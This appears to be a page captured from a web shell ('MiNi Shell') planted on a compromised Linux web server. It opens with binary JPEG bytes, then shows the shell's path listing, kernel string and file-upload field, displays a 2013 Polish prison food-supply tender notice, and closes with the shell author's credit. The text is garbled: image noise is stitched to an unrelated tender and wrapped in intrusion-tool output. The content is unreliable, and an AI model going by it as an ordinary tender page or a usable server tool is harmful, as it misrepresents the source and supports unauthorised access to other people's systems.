JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131119/472492-N-2013.html

<p class="kh_header"><b>Śrem: Dostawy artykułów spożywczych z grup 156 oraz 158 CPV.</b><br>
<b>Numer ogłoszenia: 472492 - 2013; data zamieszczenia: 19.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Śremie , ul. Wawrzyniaka 6, 63-100 Śrem, woj. wielkopolskie, tel. 061 2830703, faks 061 2830719.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Jednostka Budżetowa Wymiaru Sprawiedliwości.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych z grup 156 oraz 158 CPV..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy artykułów spożywczych z grup 156 oraz 158 CPV. 
Ustala się następującą grupę CPV, według której zamawiający dokonał podziału przedmiotu zamówienia:
15800000-6 Różne produkty spożywcze oraz 15600000-4 produkty przemiału ziarna, skrobi i produktów skrobiowych określone we Wspólnym Słowniku Zamówień, w skład której to grupy wchodzi:

Dla części I 
15811000-6 Pieczywo,
15811100-7 Chleb.

Dla części II 
15870000-7 Przyprawy i przyprawy korzenne,
15871230-5 Ketchup,
15871250-1 Musztarda,
15871273-8 Majonez,
15872400-5 Sól,
15872100-2 Pieprz,
15871110-8 Ocet lub produkty równoważne,
15872300-4 Zioła,
15871260-4 Sosy,
15831000-2 Cukier,
15851100-9 Makaron niegotowany,
15860000-4 Kawa, herbata i podobne produkty,
15891000-0 Zupy i buliony,
15890000-3 Różne produkty spożywcze i produkty suszone.
15610000-7 Produkty przemiału ziarna
15612100-2 Mąka pszenna
15614000-5 Ryż przetworzony
15613380-5 Płatki owsiane

3.1 Przedmiot zamówienia w zakresie części nr 1 dotyczy - szczegółowy zakres, ilość, wyszczególnienie:

Część 1
L.p.	Przedmiot zamówienia 
Część 1	Grupa asortymentowa	Szacunkowe potrzeby ilość w kg 
1	Chleb pszenno-żytni	krojony, foliowany, 400 g	18100 kg
2	Chleb pszenny	krojony, foliowany, 400 g	630 kg
3	Chleb razowy	krojony, foliowany, 400 g	160 kg
4	Bułka tarta	luz	140 kg
Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom
Zamawiający nie dopuszcza możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom 
Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
Zamawiający nie dopuszcza możliwość udzielenia zamówień uzupełniających.  
Podana ilość asortymentu jest szacunkowa i może ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy. Z tego tytułu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego.
3.2 Przedmiot zamówienia w zakresie części nr 2 opis przedmiotu zamówienia  szczegółowy zakres, ilość, wyszczególnienie,

Część 2
L.p.	Przedmiot zamówienia 
część 2	Grupa asortymentowa	Szacunkowe potrzeby ilość w kg lub w l
1	Kasza jęczmienna	Worki od 1 do 30 kg	1230 kg
2	Kasza manna	Worki od 1 do 30 kg	310 kg
3	Mąka pszenna	Worki od 1 do 30 kg	550 kg
4	Płatki owsiane	Worki od 1 do 30 kg	300 kg
5	Ryż biały	Worki od 1 do 30 kg	1200 kg
6	Czosnek granulowany	op. od 0,5 kg do 5 kg	25 kg
7	Ketchup	op. od 0,5 kg do 5 kg łagodny, pikantny	120 kg
8	Musztarda	op. od 0,5 kg do 5 kg stołowa, sarepska	120 kg
9	Majonez	op. od 0,5 kg do 1 kg	80 kg
10	Sól jodowana	op. od 1 kg do 25 kg	300 kg
11	Pieprz mielony	op. od 0,5 kg do 5 kg	40 kg
12	Ocet	op. od 0,5 l do 5 l	90 l
13	Majeranek	op. od 0,5 kg do 5 kg	35 kg
14	Papryka mielona ostra	op. od 1 kg do 5 kg	35 kg 
15	Przyprawa Curry	op. d 0,5 kg do 5 kg	20 kg
16	Przyprawa uniwersalna	op. od 1 kg do 10 kg	40 kg 
17	Sos cygański	op. od 1 kg do 10 kg	100 kg
18	Sos grzybowy	op. od 1 kg do 10 kg	80 kg
19	Sos pieczarkowy	op. od 1 kg do 10 kg	70 kg 
20	Sos biały	op. od 1 kg do 10 kg	60 kg
21	Sos pieczeniowy	op. od 1 kg do 10 kg	80 kg
22	Koperek susz	op. od 0,5 kg do 5 kg	20 kg
23	Przyprawa do flaków	op. od 1 kg do 10 kg	30 kg
24	Cukier	luz lub paczkowany biały	2350 kg
25	Budyń	paczkowany od 1 do 10 kg	100 kg
26	Kisiel	paczkowany od 1 do 10 kg	70 kg
27	Makaron	świderki łazanki, muszelki krajanka, itd. pakowane po 10, 15, 20 kg	1570 kg
28	Herbata granulowana	op. od 0,1 kg do 10 kg	110 kg
29	Kawa zbożowa luz	op. od 1 do 25 kg	370 kg
30	Bulion Jarzynowy	op. 1 do 10 kg	60 kg
31	Przyprawa do zup w płynie	op. 1 do 10 l	60 l
32	Bulion wołowy	op. 1 do 10 kg	30 kg
33	Bulion drobiowy	op. 1 do 10 kg	80 kg
34	Mieszanka warzywna - susz	op. 5 do 20 kg	400 kg
35	Sojowa kostka	op. 5 do 20 kg	70 kg
36	Sojowa krajanka	op. 5 do 20 kg	130 kg
37	Sojowy granulat	op. 5 do 20 kg	120 kg 
38	Sojowy schabowy	op. 5 do 20 kg	110 kg
39	Zupa barszcz biały	op. 1 do 10 kg	50 kg
40	Zupa barszcz czerwony	op. 1 do 10 kg	90 kg
41	Zupa fasolowa	op. 1 do 10 kg	40 kg
42	Zupa grochowa	op. 1 do 10 kg	50 kg
43	Zupa grzybowa	op. 1 do 10 kg	50 kg
44	Zupa jarzynowa	op. 1 do 10 kg	80 kg
45	Zupa kalafiorowa	op. 1 do 10 kg	50 kg
46	Zupa ogonowa	op. 1 do 10 kg	60 kg
47	Zupa pieczarkowa	op. 1 do 10 kg	50 kg
48	Zupa pomidorowa	op. 1 do 10 kg	90 kg
49	Zupa selerowa	op. 1 do 10 kg	40 kg
50	Zupa żurek	op. 1 do 10 kg	50 kg

Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom
Zamawiający nie dopuszcza możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom 
Zamawiający nie dopuszcza możliwości składania ofert wariantowych. 
Zamawiający nie dopuszcza możliwość udzielenia zamówień uzupełniających..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1 Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w p pkt. 1.1 do 1.4,
2.2 Podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych,
2.3 Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji,
2.4 Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
2.5 Nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
3. Zamawiający odrzuca ofertę jeżeli:
3.1 Jest niezgodna z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, 
3.2 Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, 
3.3 Zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.4 Została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert, 
3.5 Wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny 
3.6 Jest nieważna na podstawie odrębnych przepisów. 
4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą
5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia / niespełna.
6. Ocena ofert w zakresie poszczególnych części będzie niezależna od siebie. Odrzucenie oferty Wykonawcy w zakresie jednej części nie powoduje automatycznie odrzucenia jego oferty w zakresie innej części.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Śledczy w Śremie
ul. Wawrzyniaka 6
63-100 Śrem.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2013 godzina 10:00, miejsce: Śledczy w Śremie
ul. Wawrzyniaka 6
63-100 Śrem
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawy artykułów spożywczych z grup 156 oraz 158 CPV - Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie części nr 1 dotyczy - szczegółowy zakres, ilość, wyszczególnienie:
Część 1
L.p.	Przedmiot zamówienia 
Część 1	Grupa asortymentowa	Szacunkowe potrzeby ilość w kg 
1	Chleb pszenno-żytni	krojony, foliowany, 400 g	18100 kg
2	Chleb pszenny	krojony, foliowany, 400 g	630 kg
3	Chleb razowy	krojony, foliowany, 400 g	160 kg
4	Bułka tarta	luz	140 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawy artykułów spożywczych z grup 156 oraz 158 CPV - Sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie części nr 2 opis przedmiotu zamówienia  szczegółowy zakres, ilość, wyszczególnienie,


Część 2
L.p.	Przedmiot zamówienia 
część 2	Grupa asortymentowa	Szacunkowe potrzeby ilość w kg lub w l
1	Kasza jęczmienna	Worki od 1 do 30 kg	1230 kg
2	Kasza manna	Worki od 1 do 30 kg	310 kg
3	Mąka pszenna	Worki od 1 do 30 kg	550 kg
4	Płatki owsiane	Worki od 1 do 30 kg	300 kg
5	Ryż biały	Worki od 1 do 30 kg	1200 kg
6	Czosnek granulowany	op. od 0,5 kg do 5 kg	25 kg
7	Ketchup	op. od 0,5 kg do 5 kg łagodny, pikantny	120 kg
8	Musztarda	op. od 0,5 kg do 5 kg stołowa, sarepska	120 kg
9	Majonez	op. od 0,5 kg do 1 kg	80 kg
10	Sól jodowana	op. od 1 kg do 25 kg	300 kg
11	Pieprz mielony	op. od 0,5 kg do 5 kg	40 kg
12	Ocet	op. od 0,5 l do 5 l	90 l
13	Majeranek	op. od 0,5 kg do 5 kg	35 kg
14	Papryka mielona ostra	op. od 1 kg do 5 kg	35 kg 
15	Przyprawa Curry	op. d 0,5 kg do 5 kg	20 kg
16	Przyprawa uniwersalna	op. od 1 kg do 10 kg	40 kg 
17	Sos cygański	op. od 1 kg do 10 kg	100 kg
18	Sos grzybowy	op. od 1 kg do 10 kg	80 kg
19	Sos pieczarkowy	op. od 1 kg do 10 kg	70 kg 
20	Sos biały	op. od 1 kg do 10 kg	60 kg
21	Sos pieczeniowy	op. od 1 kg do 10 kg	80 kg
22	Koperek susz	op. od 0,5 kg do 5 kg	20 kg
23	Przyprawa do flaków	op. od 1 kg do 10 kg	30 kg
24	Cukier	luz lub paczkowany biały	2350 kg
25	Budyń	paczkowany od 1 do 10 kg	100 kg
26	Kisiel	paczkowany od 1 do 10 kg	70 kg
27	Makaron	świderki łazanki, muszelki krajanka, itd. pakowane po 10, 15, 20 kg	1570 kg
28	Herbata granulowana	op. od 0,1 kg do 10 kg	110 kg
29	Kawa zbożowa luz	op. od 1 do 25 kg	370 kg
30	Bulion Jarzynowy	op. 1 do 10 kg	60 kg
31	Przyprawa do zup w płynie	op. 1 do 10 l	60 l
32	Bulion wołowy	op. 1 do 10 kg	30 kg
33	Bulion drobiowy	op. 1 do 10 kg	80 kg
34	Mieszanka warzywna - susz	op. 5 do 20 kg	400 kg
35	Sojowa kostka	op. 5 do 20 kg	70 kg
36	Sojowa krajanka	op. 5 do 20 kg	130 kg
37	Sojowy granulat	op. 5 do 20 kg	120 kg 
38	Sojowy schabowy	op. 5 do 20 kg	110 kg
39	Zupa barszcz biały	op. 1 do 10 kg	50 kg
40	Zupa barszcz czerwony	op. 1 do 10 kg	90 kg
41	Zupa fasolowa	op. 1 do 10 kg	40 kg
42	Zupa grochowa	op. 1 do 10 kg	50 kg
43	Zupa grzybowa	op. 1 do 10 kg	50 kg
44	Zupa jarzynowa	op. 1 do 10 kg	80 kg
45	Zupa kalafiorowa	op. 1 do 10 kg	50 kg
46	Zupa ogonowa	op. 1 do 10 kg	60 kg
47	Zupa pieczarkowa	op. 1 do 10 kg	50 kg
48	Zupa pomidorowa	op. 1 do 10 kg	90 kg
49	Zupa selerowa	op. 1 do 10 kg	40 kg
50	Zupa żurek	op. 1 do 10 kg	50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com